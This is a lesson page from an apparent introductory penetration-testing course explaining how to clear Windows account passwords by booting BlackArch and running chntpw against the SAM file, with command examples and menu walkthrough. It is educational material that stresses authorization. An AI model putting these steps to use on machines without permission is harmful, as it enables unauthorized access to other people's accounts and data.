---
title: Password resetting
course: intro_pentest
section: Exploitation
layout: lesson
---

There’s another option for defeating passwords. This technique requires
physicall access to the target machine, and although it’s very effective at
gaining access to the target, it’s also very noisy. In the previous section,
password cracking was discussed. If a skilled penetration tester is able to
access a target machine alone for just a few minuts, he or she should be able to
get a copy of the password hashes. All things considered, this could be a very
stealthy attack and difficult to detect. In most cases, the penetration tester
will leave few clues that he or she were ever on the target machine. Remember
the penetration tester can take the passwords off-site and crack them at his or
her leisure.

Password resetting is another technique that can be used to gain access to a
system or to escalate privileges; however, this method is much less subtle than
password cracking. When first introducing this topic, it’s common to compare
gaining access to a Windows machine by performing a password reset to a burglar
driving a bulldozer through the wall of a store to gain access to the premises.
It may be effective, but you can be sure that the storeowner and employees will
know that they were broken into.

Password resetting is a technique that allows an attacker to literally overwrite
the SAM file and create a new password for any user on a modern Windows system.
This process can be performed without ever knowing the original password,
although it does require you to have physical access to the machine

As with all other techniques discussed in this course, it’s vital that you have
authorization before proceeding with this attack. It’s also important that you
understand the implications of this technique. Once you change the password,
there’ll be no way to restore it. As described in the beginning of this section,
it’s very much like a burglar driving a bulldozer through the side of a
building. The next time a user attempts to log in and he or she finds the
password has been changed, you can bet that someone is going to notice.

With that in mind, this is still an incredibly powerful technique and one that
can be very handy for gaining access to a system. To perform password resetting,
you’ll need to boot the target system to a BlackArch installed USB stick (It
must be completely installed in there). Once booted, from the terminal you’ll
need to mount the physical hard drive of the system containing the SAM file. You
can find the instructions for performing this task in the previous section.
After mounting the hard drive, you can run the "`chntpw`" command to reset the
password. To review the full options available switches, you can issue the
following command:

```
chntpw -h
```

Assume that you want to reset the administrator password on your target machine.
To accomplish this, you’d issue the following command:

```
chntpw -i /mnt/sda1/Windows/System32/config/SAM
```

the command above, the “chntpw” is used to start the password resetting program.
The “-i” is used to run the program interactively and allow you to choose the
user you’d like reset. The “/mnt/sda1/Windows/System32/config/SAM” is the
mounted directory containing the SAM file of our target machine. It’s important
to make sure you have access to the SAM file; remember, not all drives are
listen as sda1. As mentioned earlier, running the “fdisk -l” command can be
helpful in determining the appropriate drive.

After running the "`chntpw -i /mnt/sda1/Windows/System32/config/SAM`" command,
you’ll be presented with a series of interactive menu-driven options that will
allow you to reset the password for the desired user. Each of the steps is very
clearly laid out and described; you simply need to take a few moments to read
what is being asked. The program is actually designed with a series of “default”
answers and in most cases you can simply hit the “enter” key to accept the
default choice.

![](/img/courses/intro-pentest/chntpw1.png)

As shown in the previous image, after loading, the first question you are asked
is: “What to do? [1]” Above the question you’ll see a series of five options to
choose from. Simply enter the number or letter that corresponds to the choice
you want to make and hit the “enter” key to continue. The “[1]” after the
question indicates that choice “1” is the default.

In our example, we are planning to reset the password for the administrator
account, so we can type “1” and hit enter, or simply hit the enter key to accept
the default. Next, we are presented with a list of users available on the local
Windows machine. You can select the desired user by typing in his or her
username as displayed. Once again, the default option is to set to
“Administrador (Administrator in spanish)”. The next image shows a screenshot of
the available users.

![](/img/courses/intro-pentest/chntpw2.png)

Here again, we can simply hit the “enter” key to accept the default choice of an
administrator account “Golem”. Next, we are presented with the various options
for editing the user on the target machine as shown in the next image. Please
  note that at this step, you don’t want to accept the default option!

![](/img/courses/intro-pentest/chntpw3.png)

As previously mentioned, at this point you want to be sure you select option “1”
ti clear the password. After entering your selection to clear the user password,
you’ll get a message stating: “Password cleared!”. At this point, you can reset
another user’s password or enter “!” to quit the program. It’s important that
you complete the remaining steps because at this point the new SAM file hasn’t
been written to the hard drive. In the menu that follows enter “q” to quit the
chntpw program. At last, you’ll be prompted with a message asking if you’d like
to write your changes to the hard drive. Be sure to enter “y” at this step as
the default is set to “n”.

The password for the selected user has now been cleared and is blank. You can
shut down BlackArch by issuing the “reboot” command and ejecting the DVD. When
Windows restarts, you can log into the account by leaving the password blank.
